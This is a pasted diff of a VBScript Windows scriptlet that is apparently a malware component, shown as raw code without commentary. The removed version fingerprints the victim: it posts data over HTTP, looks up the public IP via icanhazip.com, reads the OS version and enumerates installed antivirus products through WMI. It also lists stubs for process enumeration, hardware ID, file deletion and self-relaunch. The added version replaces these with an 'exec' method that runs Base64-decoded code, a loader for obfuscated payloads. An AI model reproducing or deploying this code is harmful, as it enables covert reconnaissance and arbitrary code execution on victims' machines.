SHOW:
|
|
- or go back to the newest paste.
1 | <?XML version="1.0"?> | |
2 | <scriptlet> | |
3 | ||
4 | <registration | |
5 | description="Graihhrj" | |
6 | progid="Graihheerj" | |
7 | version="1.00" | |
8 | classid="{F0001111-0111-0000-0000-0000FFEDACDC}" | |
9 | > | |
10 | </registration> | |
11 | <public> | |
12 | - | <method name="HTTPPost"></method> |
12 | + | <method name="exec"></method> |
13 | - | <method name="IPAdress"></method> |
13 | + | |
14 | - | <method name="InstallDateFunc"></method> |
14 | + | |
15 | - | <method name="GetOs"></method> |
15 | + | |
16 | - | <method name="GetAV"></method> |
16 | + | |
17 | - | <method name="MaxFrameworkVersionCheck"></method> |
17 | + | |
18 | - | <method name="ConvertToUnixTimeStamp"></method> |
18 | + | |
19 | - | <method name="var6"></method> |
19 | + | Function exec(sUrl) |
20 | - | <method name="DeleteAFile"></method> |
20 | + | exec = execute(Base64Decode(sUrl)) |
21 | - | <method name="enumprocess"></method> |
21 | + | |
22 | - | <method name="HWIDf"></method> |
22 | + | Function Base64Decode(ByVal base64String) |
23 | - | <method name="GetFilesAndFolders"></method> |
23 | + | 'rfc1521 |
24 | - | <method name="GetHardDirve"></method> |
24 | + | '1999 Antonin Foller, Motobit Software, http://Motobit.cz |
25 | - | <method name="killPastInstances"></method> |
25 | + | Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" |
26 | - | <method name="genRndStr"></method> |
26 | + | Dim dataLength, sOut, groupBegin |
27 | - | <method name="forceCscript"></method> |
27 | + | |
28 | - | <method name="runSelf"></method> |
28 | + | 'remove white spaces, If any |
29 | base64String = Replace(base64String, vbCrLf, "") | |
30 | base64String = Replace(base64String, vbTab, "") | |
31 | base64String = Replace(base64String, " ", "") | |
32 | ||
33 | - | Function ConvertToUnixTimeStamp() |
33 | + | 'The source must consists from groups with Len of 4 chars |
34 | - | Dim d : d = CDate(Now) |
34 | + | dataLength = Len(base64String) |
35 | - | ConvertToUnixTimeStamp = CStr(DateDiff("s", "01/01/1970 00:00:00", d)) |
35 | + | If dataLength Mod 4 <> 0 Then |
36 | Err.Raise 1, "Base64Decode", "Bad Base64 string." | |
37 | - | Function HTTPPost(sUrl, sRequest) |
37 | + | Exit Function |
38 | - | set oHTTP = CreateObject("Microsoft.XMLHTTP") |
38 | + | End If |
39 | - | oHTTP.open "POST", sUrl,false |
39 | + | |
40 | - | oHTTP.send sRequest |
40 | + | |
41 | - | HTTPPost = oHTTP.responseText |
41 | + | ' Now decode each group: |
42 | For groupBegin = 1 To dataLength Step 4 | |
43 | - | Function IPAdress() |
43 | + | Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut |
44 | - | dim NIC1, Nic, StrIP, CompName |
44 | + | ' Each data group encodes up To 3 actual bytes. |
45 | - | MyIP_WinHTTP = "0.0.0.0" |
45 | + | numDataBytes = 3 |
46 | - | strURL = "http://icanhazip.com/" |
46 | + | nGroup = 0 |
47 | - | Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) |
47 | + | |
48 | - | Set NIC1 = GetObject("winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration") |
48 | + | For CharCounter = 0 To 3 |
49 | - | For Each Nic in NIC1 |
49 | + | ' Convert each character into 6 bits of data, And add it To |
50 | - | if Nic.IPEnabled then |
50 | + | ' an integer For temporary storage. If a character is a '=', there |
51 | - | StrIP = Nic.IPAddress(i) |
51 | + | ' is one fewer data byte. (There can only be a maximum of 2 '=' In |
52 | - | Exit For |
52 | + | ' the whole string.) |
53 | - | end if |
53 | + | |
54 | - | next |
54 | + | thisChar = Mid(base64String, groupBegin + CharCounter, 1) |
55 | - | objHTTP.Open "GET", strURL |
55 | + | |
56 | - | objHTTP.Send |
56 | + | If thisChar = "=" Then |
57 | - | MyIP_WinHTTP = objHTTP.ResponseText |
57 | + | numDataBytes = numDataBytes - 1 |
58 | - | IPAdress = MyIP_WinHTTP + "/" + strip |
58 | + | thisData = 0 |
59 | Else | |
60 | thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 | |
61 | End If | |
62 | - | Function InstallDateFunc(pathh) |
62 | + | If thisData = -1 Then |
63 | - | Set objFSO = Createobject ("Scripting.FileSystemObject") |
63 | + | Err.Raise 2, "Base64Decode", "Bad character In Base64 string." |
64 | - | Set objFile = objFSO.GetFile(pathh) |
64 | + | Exit Function |
65 | - | InstallDateFunc = FormatDateTime(CDate(objFile.DateLastModified),2) |
65 | + | End If |
66 | ||
67 | - | Function GetOs() |
67 | + | nGroup = 64 * nGroup + thisData |
68 | - | Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") |
68 | + | |
69 | - | Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48) |
69 | + | |
70 | - | For Each objItem in colItems |
70 | + | 'Hex splits the long To 6 groups with 4 bits |
71 | - | GetOs = objItem.Caption |
71 | + | nGroup = Hex(nGroup) |
72 | - | Next |
72 | + | |
73 | 'Add leading zeros | |
74 | - | Function GetAV() |
74 | + | nGroup = String(6 - Len(nGroup), "0") & nGroup |
75 | - | security = "" |
75 | + | |
76 | - | set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") |
76 | + | 'Convert the 3 byte hex integer (6 chars) To 3 characters |
77 | - | set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) |
77 | + | pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ |
78 | - | for each objitem in colitems |
78 | + | Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ |
79 | - | versionstr = split (objitem.version,".") |
79 | + | Chr(CByte("&H" & Mid(nGroup, 5, 2))) |
80 | - | next |
80 | + | |
81 | - | osversion = versionstr (0) & "." |
81 | + | 'add numDataBytes characters To out string |
82 | - | for x = 1 to ubound (versionstr) |
82 | + | sOut = sOut & Left(pOut, numDataBytes) |
83 | - | osversion = osversion & versionstr (i) |
83 | + | Next |
84 | - | next |
84 | + | |
85 | - | osversion = eval (osversion) |
85 | + | Base64Decode = sOut |
86 | - | if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter" |
86 | + | |
87 | - | set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) |
87 | + | |
88 | - | Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0) |
88 | + | |
89 | - | for each objantivirus in colantivirus |
89 | + | |
90 | - | security = security & objantivirus.displayname & " ." |
90 | + |